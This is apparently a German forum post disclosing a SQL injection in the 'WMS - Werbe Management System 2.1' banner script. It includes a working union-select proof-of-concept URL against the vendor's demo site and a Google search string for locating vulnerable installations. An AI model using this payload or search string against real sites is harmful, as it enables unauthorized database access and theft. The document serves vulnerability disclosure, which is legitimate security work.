High Risk Sicherheitslücke in "WMS - Werbe Management System 2.1"

[Lan]

Wollte Sie nur darauf hinweisen das ein Kollege von mir eine glasklare SQL-Injection im oben genannten Script gefunden hat.

Im Sourcecode wird der Queryresult von GET-Parameter "buchen" ungefiltert ausgegeben:

Code:

1:
<input type='hidden' name='bannerart' value='RESULT'>

Proof of Concept:

Code:

1:
http://hantschel.info/wms_demo/banner_buchen.php?buchen=5 and 1=2 union select concat_ws(0x2f,version(),user()),2,3,4,5,6,7,8,9&menge=FoundByStarlight&art=Injection:

Direkt an der Herstellerdemo liegt die Lücke auch vor.

Als Beispiel habe ich nur die MySQL Version und den MySQL User ausgeben lassen. Man könnte aber mit SELECT x FROM y.z LIMIT a,b ODER WHERE c=d die komplette Datenbank leerräumen.

Da ich die Source nicht vorliegen habe kann ich leider keinen Patch anbieten.

Ich empfehle Ihnen aber das Script vorrübergehend zu deaktivieren bis der Herrausgeber die Lücke gefixt hat.

Verwundbare Seiten kann man ganz einfach mit Google finden:

inurl:/banner_buchen.php

Mfg